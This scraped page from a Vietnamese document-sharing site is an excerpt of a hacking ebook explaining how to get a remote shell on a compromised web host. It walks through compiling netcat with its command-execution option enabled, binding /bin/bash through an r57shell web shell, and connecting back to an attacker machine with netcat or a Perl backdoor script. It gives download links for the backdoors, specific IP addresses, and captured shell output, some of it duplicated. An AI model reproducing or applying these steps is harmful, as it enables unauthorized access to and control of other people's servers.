Hacker Professional Ebook part 207 docx

5 327 0
Hacker Professional Ebook part 207 docx

Đang tải... (xem toàn văn)

Thông tin tài liệu

1) Netcat for Win32 & *NIX , PuTTy : Trích: http://ruthtr.com/uploads/Netcat.zip Trích: http://www.tartarus.org/~simon/putty /x86/putty.exe 2) Máy tính nối mạng riêng tại nhà hoặc 1 hosting hỗ trợ SSH. (ở đây ĐĐ xài hosting) 3) Đã tham khảo qua bài viết này : Trích: http://www.quantrimang.com/view.asp? 1&news_id=7378 4) Một con r57shell hoặc script connect-back bất kì : Trích: http://k.1asphost.com/dondoc/dc.pl Trích: http://k.1asphost.com/dondoc/r57.php 5) Kiến thức Windows và *NIX. - Start : - Install netcat trên hosting : - Mở file netcat.c chỉnh một số thứ sau : + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu / : // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET - Up lên host - Dùng PuTTy kết nối đến = SSH - biên dịch: make linux - chmod nc 755 - chạy thử: ./nc -h Nếu hiện ra như sau là được : - Bind Port : Cái này trong con r57shell đã hỗ trợ sẵn , cách làm tương đối đơn giản Kéo xuống cuối con r57 phần : Bind port to /bin/bash , trong đó : - Port : bất kỳ port nào bạn thích , ví dụ : 2121 - Password for access : pass để quyền truy cập (để mặc định là r57) - Use : để là Perl Xong rồi bạn nhấn Bind , sau đó trên máy tính của mình bạn mở Netcat ra và kết nối đến victim như sau : Cú pháp : Trích: C:\netcat>nc -nvv [ip của victim] 2121 -nvv : dùng ip dạng số và hiển thị thông tin chi tiết về kết nối hiện tại Ví dụ : Trích: C:\netcat>nc -nvv 66.246.215.103 2121 Nếu ok thì ta sẽ nhận được shell lệnh. Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect . - Back-connect : Cách 1 : Vào phần back-connect của con r57 : - IP : địa chỉ IP của host install netcat ví dụ 216.120.237.150 - Port: bất kì ví dụ 3131 - Use : để mặc định Perl Dùng PuTTy kết nối đến host = SSH , di chuyển đến thư mục chứa con netcat vừa biên dịch : Chạy lệnh sau : Trích: bash-2.05a$ ./nc -l -n -v -p 3131 Quay sang con r57 nhấn Connect , nếu ok thì trên cửa sổ PuTTy sẽ được như sau : Code: listening on [any] 3131 connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 56973 Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux uid=32466(ruth) gid=969(ruth) groups=969(ruth) xong ! Cách 2 : Upload file dc.pl ở trên lên host Dùng con r57 run command như sau : Cú pháp : Trích: perl dc.pl [ip] [port] Ví dụ : Trích: perl dc.pl 216.120.237.150 4141 Cửa sổ PuTTy để netcat lắng nghe tại cổng 4141 , nếu ko có gì trở ngại thì ta sẽ được shell lệnh như sau : Code: listening on [any] 4141 connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 57421 == ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE == ==Systeminfo== Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux ==Userinfo== uid=32466(ruth) gid=969(ruth) groups=969(ruth) ==Directory== /home/ruth/public_html/uploads/test ==Shell== id uid=32466(ruth) gid=969(ruth) groups=969(ruth) . [216.120.237.150] from (UNKNOWN) [216.118.97.168] 57421 == ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE == ==Systeminfo== Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP

Ngày đăng: 04/07/2014, 12:20

Tài liệu cùng người dùng

Tài liệu liên quan